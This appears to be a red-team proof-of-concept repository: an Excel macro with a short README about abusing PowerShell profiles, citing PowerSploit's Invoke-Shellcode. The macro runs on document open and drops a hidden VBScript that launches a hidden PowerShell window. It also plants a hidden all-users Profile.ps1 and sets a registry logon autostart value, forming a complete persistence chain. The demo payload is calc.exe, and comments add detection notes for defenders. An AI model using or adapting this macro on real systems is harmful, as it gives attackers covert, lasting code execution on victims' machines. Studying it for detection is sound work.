├── Macro
└── README.md


/Macro:
--------------------------------------------------------------------------------
'Coded by Matt Nelson
'twitter.com/enigma0x3
'enigma0x3.wordpress.com

' Overview (as shown by the code below): a proof-of-concept Office macro that
' sets up persistence in three steps when the document is opened:
'   1. WriteWrapper - drops a hidden VBScript that starts powershell.exe with a hidden window.
'   2. WriteProfile - drops a hidden Profile.ps1 into the PowerShell install directory.
'   3. Reg          - points a per-user registry autostart value at the VBScript.
' The only payload in this listing is a command that opens calc.exe.

' Auto_Open is the macro name Excel runs automatically when a workbook is
' opened, provided macros are enabled. Blocking or disabling macros for
' documents from untrusted sources stops the chain before any step runs.
Sub Auto_Open()

    WriteWrapper
    WriteProfile
    Reg

End Sub

' Writes a five-line VBScript that launches powershell.exe through
' WScript.Shell.Run with window style 0 (no visible window). The file is
' created as cookie.txt, renamed to cookie.vbs, then marked hidden.
' No return value is assigned, so the function returns Empty.
' NOTE(review): the path is hard-coded under C:\Users\Default rather than the
' profile of the user who opens the document; whether the write succeeds
' depends on that user's rights on the folder - confirm.
' Defender note: the script extension only appears at the Name (rename) step,
' so file telemetry should cover renames to .vbs as well as file creation,
' and flag an Office process as the writer.
Public Function WriteWrapper() As Variant
    Set fs = CreateObject("Scripting.FileSystemObject")
    ' Second argument True = overwrite an existing file of the same name.
    Set a = fs.CreateTextFile("C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\cookie.txt", True)
    a.WriteLine ("Dim objShell")
    a.WriteLine ("Set objShell = WScript.CreateObject(""WScript.Shell"")")
    a.WriteLine ("command = ""C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe""")
    ' The 0 passed to Run is the window style: the PowerShell window is hidden.
    a.WriteLine ("objShell.Run command,0")
    a.WriteLine ("Set objShell = Nothing")
    a.Close
    GivenLocation = "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\"
    OldFileName = "cookie.txt"
    NewFileName = "cookie.vbs"
    Name GivenLocation & OldFileName As GivenLocation & NewFileName
    SetAttr "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\cookie.vbs", vbHidden

End Function

' Writes Profile.ps1 into the WindowsPowerShell\v1.0 directory. A profile.ps1
' in the PowerShell install directory is the all-users, all-hosts profile,
' which PowerShell loads at the start of a session unless it is started with
' -NoProfile; loading is also subject to the execution policy in force.
' The profile content here is a single line that opens calc.exe.
' SysNative is the alias a 32-bit process uses to reach the native System32
' directory on 64-bit Windows.
' NOTE(review): writing under C:\Windows normally requires administrative
' rights, so this step presumably fails for a standard user - confirm.
' Defender note: creation or modification of profile.ps1 in the PowerShell
' install directory, especially by an Office process, is worth alerting on.
Public Function WriteProfile() As Variant
    Set fs = CreateObject("Scripting.FileSystemObject")
    Set a = fs.CreateTextFile("C:\Windows\SysNative\WindowsPowerShell\v1.0\Profile.txt", True)
    a.WriteLine ("Invoke-Item C:\Windows\System32\calc.exe")
    a.Close
    GivenLocation = "C:\Windows\SysNative\WindowsPowerShell\v1.0\"
    OldFileName = "Profile.txt"
    NewFileName = "Profile.ps1"
    ' Same create-as-.txt, rename, hide sequence as WriteWrapper.
    Name GivenLocation & OldFileName As GivenLocation & NewFileName
    SetAttr "C:\Windows\SysNative\WindowsPowerShell\v1.0\Profile.ps1", vbHidden
End Function

' Sets the per-user "Load" value under
' HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows to the path of
' cookie.vbs. That value is a logon autostart location, so the resulting
' chain is: user logon -> cookie.vbs -> hidden powershell.exe -> Profile.ps1.
' The write is to HKCU, which the current user can normally modify.
' Defender note: monitor this value with registry auditing or an autostart
' inventory tool; a script path here, written by an Office process, is a
' strong persistence indicator.
Public Function Reg() As Variant
    Set WshShell = CreateObject("WScript.Shell")
    WshShell.RegWrite "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load", "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\cookie.vbs", "REG_SZ"
    Set WshShell = Nothing

End Function


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
PowershellProfile
=================

Abuses Powershell Profiles

A walk-through can be found here:
http://enigma0x3.wordpress.com/2014/06/16/abusing-powershell-profiles/


Uses Invoke-Shellcode by Matt Graeber:
PowerSploit Function: Invoke-Shellcode
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None

--------------------------------------------------------------------------------